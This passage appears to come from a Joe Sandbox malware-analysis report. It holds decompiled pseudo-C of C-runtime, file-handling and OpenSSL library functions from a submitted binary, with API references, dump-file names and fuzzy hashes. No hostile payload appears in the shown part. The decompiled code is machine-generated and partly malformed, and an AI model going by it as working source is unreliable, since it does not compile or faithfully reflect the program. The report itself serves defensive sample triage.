				 *((short*)(__r9 + 6)) = E00007FF77FF7DA8E4A08(_t60, __r9, __rcx, __r8, _t102);
				E00007FF77FF7DA8E48CC(_t60, _v92, _t96); // executed
				 *(__r9 + 0x20) = _t79;
				E00007FF77FF7DA8E48CC(_t60, _v100, _t79); // executed
				_t89 = _v108;
				 *(__r9 + 0x18) = _t79;
				E00007FF77FF7DA8E48CC(_t60, _t89,  *(__r9 + 0x20)); // executed
				 *(__r9 + 0x28) = _t79;
				 *(__r9 + 0x14) =  *(__r9 + 0x14) & 0x00000000;
				if (_v80 != 0) goto 0xda8e4822;
				_t47 = _v76;
				if (_t47 - 0x7fffffff > 0) goto 0xda8e4822;
				 *(__r9 + 0x14) = _t47;
				goto 0xda8e48a6;
				E00007FF77FF7DA8E4394(_t79);
				 *_t79 = 0x84;
				goto 0xda8e4846;
				_t25 = _t89 - 2; // -2
				if (_t25 - r15d <= 0) goto 0xda8e4859;
				if (_t60 != 0) goto 0xda8e484a;
				E00007FF77FF7DA8E4394(_t79);
				 *_t79 = 9;
				goto 0xda8e48a9;
				_t61 = GetLastError();
				E00007FF77FF7DA8E4308(_t61, _t79, _t89);
				goto 0xda8e4846;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				 *((intOrPtr*)(__r9 + 0x10)) = r14d;
				 *__r9 = r14d;
				_t55 =  ==  ? 0x2000 : 0x1000;
				 *((short*)(__r9 + 6)) =  ==  ? 0x2000 : 0x1000;
				if (_t61 == 2) goto 0xda8e48a6;
				_v128 = _v128 & 0x00000000;
				_v136 =  &_v120;
				r9d = 0;
				r8d = 0;
				if (PeekNamedPipe(??, ??, ??, ??, ??, ??) == 0) goto 0xda8e48a6;
				 *(__r9 + 0x14) = _v120;
				return E00007FF77FF7DA8DACF0(r15b, _v120, _v56 ^ _t102 - 0x00000080);
			}

APIs

GetFileType.KERNEL32 ref: 00007FF7DA8E4757
GetFileInformationByHandle.KERNEL32 ref: 00007FF7DA8E47B9
GetLastError.KERNEL32 ref: 00007FF7DA8E484A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7DA8E465C), ref: 00007FF7DA8E4896

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: d63e1d5f4f664f7d448d3fdfa223882025be55e07d60f456332d5d4c6abb6cae
Instruction ID: fa749ce9de02eecb2957cc2eb35038be2d99fd49411a21dd05200126516d2b71
Opcode Fuzzy Hash: d63e1d5f4f664f7d448d3fdfa223882025be55e07d60f456332d5d4c6abb6cae
Instruction Fuzzy Hash: 0351C022E082928AF711EFB1D4403BCB3A1BB64B58F904536DE1D5768ADF3ED5608320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DAE5C Relevance: 6.1, APIs: 4, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FF77FF7DA8DAE5C(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
				char _v24;
				void* _t8;
				void* _t9;
				void* _t10;
				signed short _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t35;
				intOrPtr* _t54;
				intOrPtr* _t55;

				_t56 = __rbx;
				_t54 = __rax;
				_a8 = __rbx;
				_t8 = E00007FF77FF7DA8DB2CC(1); // executed
				if (_t8 == 0) goto 0xda8dafa8;
				dil = 0;
				_v24 = dil;
				_t9 = E00007FF77FF7DA8DB290();
				_t35 =  *0xda91c560; // 0x2
				if (_t35 == 1) goto 0xda8dafb3;
				if (_t35 != 0) goto 0xda8daee4;
				 *0xda91c560 = 1;
				_t10 = E00007FF77FF7DA8E85C4(__rbx, 0xda8fa468, 0xda8fa4a8); // executed
				if (_t10 == 0) goto 0xda8daec5;
				goto 0xda8daf9d;
				E00007FF77FF7DA8E8580(_t56, 0xda8fa450, 0xda8fa460); // executed
				 *0xda91c560 = 2;
				goto 0xda8daeec;
				dil = 1;
				_v24 = dil;
				E00007FF77FF7DA8DB5E4(E00007FF77FF7DA8DB43C(_t9, 0xda8fa460));
				if ( *_t54 == 0) goto 0xda8daf1f;
				if (E00007FF77FF7DA8DB3A4(_t54, _t54) == 0) goto 0xda8daf1f;
				r8d = 0;
				_t55 =  *_t54;
				E00007FF77FF7DA8DB5EC( *0xda8fa428());
				if ( *_t55 == 0) goto 0xda8daf41;
				if (E00007FF77FF7DA8DB3A4(_t55, _t55) == 0) goto 0xda8daf41;
				E00007FF77FF7DA8E88D4( *_t55);
				_t20 = E00007FF77FF7DA8DB748(0xda8fa460);
				E00007FF77FF7DA8E852C();
				r9d = _t20 & 0x0000ffff;
				_t72 = _t55;
				_t22 = E00007FF77FF7DA8D1000(_t55); // executed
				if (E00007FF77FF7DA8DB78C(_t55) == 0) goto 0xda8dafbd;
				if (dil != 0) goto 0xda8daf77;
				E00007FF77FF7DA8E88B8(0x7ff7da8d0000, 0xda8fa460, _t55);
				E00007FF77FF7DA8DB460(1, 0);
				_t26 = _t22;
				if (E00007FF77FF7DA8DB78C(_t55) == 0) goto 0xda8dafc5;
				if (_v24 != 0) goto 0xda8daf9b;
				E00007FF77FF7DA8E88A8(0x7ff7da8d0000, 0xda8fa460, _t72);
				return _t26;
			}

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7DA8DAE6B

Part of subcall function 00007FF7DA8DB2CC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7DA8DB2EE

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7DA8DAE80
__scrt_release_startup_lock.LIBCMT ref: 00007FF7DA8DAEEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7DA8DAF41

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f9463a67af73ecdf476021b69832aa8e37fe24f2495d1c1145be39d635d83d96
Instruction ID: 5f6afc38eacbdcbb3639f0b17e4d601ddf6e86da769ec44f4493976a6ad2f91a
Opcode Fuzzy Hash: f9463a67af73ecdf476021b69832aa8e37fe24f2495d1c1145be39d635d83d96
Instruction Fuzzy Hash: 17313621A0924789FE16BB2494153BDE291BF90754FD848F7ED0E472D3DE2DA9248370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E45D0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E45FD
CreateFileW.KERNEL32 ref: 00007FF7DA8E463C
CloseHandle.KERNEL32 ref: 00007FF7DA8E4671

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: d65c13593cf6935a0391c88ec2fb83f7f07440e81e11b809fa8edf9c6efc289f
Instruction ID: 30780369c51df8c862a2d67f19625eec74dc7397d71dd6972650af86e01b571f
Opcode Fuzzy Hash: d65c13593cf6935a0391c88ec2fb83f7f07440e81e11b809fa8edf9c6efc289f
Instruction Fuzzy Hash: 9D419362E18782C3F715AB21950036DA360FBA5764F909376DE9C03AD2DF6EA6F08710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E87D8 Relevance: 4.5, APIs: 3, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF7DA8E87D8() {
				void* _t6;
				void* _t11;

				if (E00007FF77FF7DA8E880C() == 0) goto 0xda8e87fa;
				GetCurrentProcess();
				E00007FF77FF7DA8E8830(TerminateProcess(??, ??), _t6, _t11);
				ExitProcess(??);
			}

0x7ff7da8e87e7
0x7ff7da8e87e9
0x7ff7da8e87fc
0x7ff7da8e8803

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7DA8E87D4), ref: 00007FF7DA8E87E9
TerminateProcess.KERNEL32(?,?,?,00007FF7DA8E87D4), ref: 00007FF7DA8E87F4
ExitProcess.KERNEL32 ref: 00007FF7DA8E8803

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4ddb213536c4213914e1d39c5867685a565ce616895cde70da5e96fb304fa213
Instruction ID: e6fbdfe6263431900afece4bc74d2333f75b3e5c65a8862671ffc359b65bf2ec
Opcode Fuzzy Hash: 4ddb213536c4213914e1d39c5867685a565ce616895cde70da5e96fb304fa213
Instruction Fuzzy Hash: BAD09E10F1874786FA163B715C9517DD2117FA8755FC418BACC5B06393CD2EB5BD8220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DF2EC Relevance: 3.2, APIs: 2, Instructions: 177
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8DF2EC(intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long __r9, long long _a8, long long _a32, void* _a40) {

				_a8 = __rbx;
				_a32 = __r9;
				if (__r8 == 0) goto 0xda8df335;
				if (__r9 == 0) goto 0xda8df335;
				if (__rcx != 0) goto 0xda8df34c;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				return 0;
			}

0x7ff7da8df2ec
0x7ff7da8df2f1
0x7ff7da8df319
0x7ff7da8df31e
0x7ff7da8df323
0x7ff7da8df325
0x7ff7da8df32a
0x7ff7da8df330
0x7ff7da8df34b

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF330
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF427

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
Instruction ID: cc2b28c19d126d2a3c320a2fd12da7a28884a5951ddb16e3dcaa9219fb11be01
Opcode Fuzzy Hash: 4e38ebb67bc940453e85471c4fa41f8c71406493bfbb1ff44c5ef19ba65e7d48
Instruction Fuzzy Hash: 9251EA61B0A28289FE2AAD25D50067EE591BF40B64FCC4676DD6C477C7EE3CD8219720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFCFD865146 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140 ref: 00007FFCFD902E56

Strings

..\s\crypto\asn1\a_bitstr.c, xrefs: 00007FFCFD902DF8, 00007FFCFD902E19, 00007FFCFD902E76

Memory Dump Source

Source File: 00000001.00000002.331776617.00007FFCFD861000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFCFD860000, based on PE: true

Associated: 00000001.00000002.331752717.00007FFCFD860000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD86D000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8C5000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8D9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8E9000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFD8FD000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.331776617.00007FFCFDAAC000.00000020.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAAE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB30000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.332690726.00007FFCFDB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333064516.00007FFCFDB7E000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333088610.00007FFCFDB84000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDB86000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA2000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.333101050.00007FFCFDBA6000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffcfd860000_4Vp6Xc8SFr.jbxd

Similarity

API ID: memmove
String ID: ..\s\crypto\asn1\a_bitstr.c
API String ID: 2162964266-730171910
Opcode ID: 5895a73b0c2e654e5348807e6bacfb1ae539d438ddc9506c873446738a522f49
Instruction ID: 81e95c63f4474886df056f2ba753c0a12901dafc783e6f71cc22b6c12f4be85f
Opcode Fuzzy Hash: 5895a73b0c2e654e5348807e6bacfb1ae539d438ddc9506c873446738a522f49
Instruction Fuzzy Hash: 0031C331A1976A86EB118F61A824669EAA0FB04B94F044131EF6C077C5EF3DE951C7B0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DAD70 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00007FF77FF7DA8DAD70(intOrPtr* __rax) {
				void* __rbx;
				void* _t2;
				intOrPtr _t6;
				void* _t20;
				intOrPtr* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t32 = __rax;
				E00007FF77FF7DA8E7B24(_t2, 2);
				E00007FF77FF7DA8E56EC(E00007FF77FF7DA8DB594(), __rax, _t34);
				_t6 = E00007FF77FF7DA8D53C0();
				E00007FF77FF7DA8E8A70(_t6);
				 *_t32 = _t6;
				if (E00007FF77FF7DA8DB318(1, _t32) == 0) goto 0xda8dae1b;
				E00007FF77FF7DA8DB84C(_t33);
				E00007FF77FF7DA8DB4C8(E00007FF77FF7DA8DB318(1, _t32), _t32);
				if (E00007FF77FF7DA8E7DBC(E00007FF77FF7DA8DB58C(), _t32, _t33, E00007FF77FF7DA8DB890, _t37) != 0) goto 0xda8dae1b;
				E00007FF77FF7DA8DB59C();
				if (E00007FF77FF7DA8DB5D8() == 0) goto 0xda8dade3;
				E00007FF77FF7DA8D3250(E00007FF77FF7DA8D3250(E00007FF77FF7DA8E7B90(_t13, 0x7ff7da8d53c0)));
				E00007FF77FF7DA8E89D0(E00007FF77FF7DA8D53C0(), _t32, 0x7ff7da8d53c0);
				if (E00007FF77FF7DA8DB5B0() == 0) goto 0xda8dae07; // executed
				0xda8e8524(); // executed
				_t20 = E00007FF77FF7DA8D53C0();
				0xda8db784();
				if (_t20 != 0) goto 0xda8dae1b;
				return _t20;
			}

APIs

_set_fmode.LIBCMT ref: 00007FF7DA8DAD87
_RTC_Initialize.LIBCMT ref: 00007FF7DA8DADA8

Part of subcall function 00007FF7DA8E7DBC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E7DEE

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: 515fc38de06c00e47728ce5206e52c4fad1dabcef5aec862fceb92a3c70ea36f
Instruction ID: 8a6894f4f406204d3d6b2b42bf3b35df5f12951f50722dfb611e49dc07561f46
Opcode Fuzzy Hash: 515fc38de06c00e47728ce5206e52c4fad1dabcef5aec862fceb92a3c70ea36f
Instruction Fuzzy Hash: F3116910E082438AFE5A77B1445A2BDC1A17F95361FC808B7ED1D872C3EE5DAA708776

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E9F78 Relevance: 3.1, APIs: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF77FF7DA8E9F78(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* __rdi;
				int _t22;
				long _t29;
				intOrPtr _t51;
				void* _t65;

				_a8 = __rbx;
				_a16 = __rsi;
				_t65 = __rdx;
				E00007FF77FF7DA8E6E48(__edi, __rax);
				if (__rax != 0xffffffff) goto 0xda8e9f9e;
				goto 0xda8e9ff8;
				_t51 =  *0xda91ca20; // 0x17ac7555ac0
				if (__edi != 1) goto 0xda8e9fb8;
				if (( *(_t51 + 0xc8) & dil) != 0) goto 0xda8e9fc5;
				if (__edi != 2) goto 0xda8e9fdc;
				if (( *(_t51 + 0x80) & 0x00000001) == 0) goto 0xda8e9fdc;
				E00007FF77FF7DA8E6E48(2, _t51);
				E00007FF77FF7DA8E6E48(1, _t51);
				if (_t51 == _t51) goto 0xda8e9f9a;
				E00007FF77FF7DA8E6E48(__edi, _t51);
				_t22 = FindCloseChangeNotification(??); // executed
				if (_t22 != 0) goto 0xda8e9f9a;
				_t29 = GetLastError();
				E00007FF77FF7DA8E6D8C(_t23, _t29, __edi, _t51, __ecx, _t65);
				 *((char*)( *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8)) = 0;
				if (_t29 == 0) goto 0xda8ea033;
				E00007FF77FF7DA8E4350(_t29, _t65);
				goto 0xda8ea035;
				return 0;
			}

APIs

FindCloseChangeNotification.KERNEL32(?,?,?,00007FF7DA8E9DF5,?,?,00000000,00007FF7DA8E9EAA), ref: 00007FF7DA8E9FE6
GetLastError.KERNEL32(?,?,?,00007FF7DA8E9DF5,?,?,00000000,00007FF7DA8E9EAA), ref: 00007FF7DA8E9FF0

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ad6594b361ddccf81c01187a23df810a25d25f951f7e4b92e7c3b860c5a51574
Instruction ID: 61657c8dfa15de9a9dde17b6f7b24b638b75a29f25f6da6806214ff180e29e27
Opcode Fuzzy Hash: ad6594b361ddccf81c01187a23df810a25d25f951f7e4b92e7c3b860c5a51574
Instruction Fuzzy Hash: 1221C511F18643C4FA527761D48427DE2927FA4BA0FD442B7EE1E472C3CE6EE5654320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8F1ACC Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF77FF7DA8F1ACC(signed int __rax, long long __rbx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				signed long long _t25;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				GetEnvironmentStringsW();
				if (__rax == 0) goto 0xda8f1b53;
				if ( *__rax == 0) goto 0xda8f1b12;
				_t25 = (__rax | 0xffffffff) + 1;
				if ( *((intOrPtr*)(__rax + _t25 * 2)) != 0) goto 0xda8f1afc;
				if ( *((intOrPtr*)(__rax + _t25 * 2 + 2)) != 0) goto 0xda8f1af8;
				E00007FF77FF7DA8ECA1C(_t25, (__rax + _t25 * 2 + 2 - __rax + 2 >> 1) + (__rax + _t25 * 2 + 2 - __rax + 2 >> 1)); // executed
				if (_t25 == 0) goto 0xda8f1b40;
				E00007FF77FF7DA8DBAC0();
				E00007FF77FF7DA8E9D68(_t25, _t25);
				return FreeEnvironmentStringsW(??);
			}

0x7ff7da8f1acc
0x7ff7da8f1ad1
0x7ff7da8f1ad6
0x7ff7da8f1ae0
0x7ff7da8f1aee
0x7ff7da8f1af6
0x7ff7da8f1afc
0x7ff7da8f1b03
0x7ff7da8f1b10
0x7ff7da8f1b22
0x7ff7da8f1b2d
0x7ff7da8f1b38
0x7ff7da8f1b42
0x7ff7da8f1b67

APIs

GetEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7DA8E7FD2,?,?,00000000,00007FF7DA8E84C6,?,?,?,?,00007FF7DA8F0474,?,?,00000000), ref: 00007FF7DA8F1AE0
FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7DA8E7FD2,?,?,00000000,00007FF7DA8E84C6,?,?,?,?,00007FF7DA8F0474,?,?,00000000), ref: 00007FF7DA8F1B4A

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA910000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330972663.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.331020191.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: EnvironmentStrings$Free
String ID:
API String ID: 3328510275-0
Opcode ID: 0ee5b91ef27c692402e33859d0454b1560df10753870356f6818918236a71bbe
Instruction ID: a2ff1800a73ea886438531ff62f2bcc4d2cdb905fbf13d347538933c33d3923c
Opcode Fuzzy Hash: 0ee5b91ef27c692402e33859d0454b1560df10753870356f6818918236a71bbe
Instruction Fuzzy Hash: B8018611E1876781FA21BB11641006DE370BF64BE0BD84576DF6E137C6DE2CE4628350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EB554 Relevance: 3.0, APIs: 2, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7DA8EB554(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v24;
				int _t22;
				void* _t24;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				E00007FF77FF7DA8E6E48(__edi, __rax);
				if (__rax != 0xffffffff) goto 0xda8eb592;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 9;
				goto 0xda8eb5e8;
				r9d = r8d;
				_t22 = SetFilePointerEx(??, ??, ??, ??); // executed
				if (_t22 != 0) goto 0xda8eb5bc;
				_t24 = E00007FF77FF7DA8E4350(GetLastError(), __r9);
				goto 0xda8eb58c;
				if (_v24 == 0xffffffff) goto 0xda8eb58c;
				 *( *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) & 0x000000fd;
				return _t24;
			}

APIs

SetFilePointerEx.KERNEL32(?,?,?,?,00000000,00007FF7DA8EB6ED), ref: 00007FF7DA8EB5A0
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7DA8EB6ED), ref: 00007FF7DA8EB5AA

Memory Dump Source

Source File: 00000001.00000002.330832121.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000001.00000002.330809729.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.330933416.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
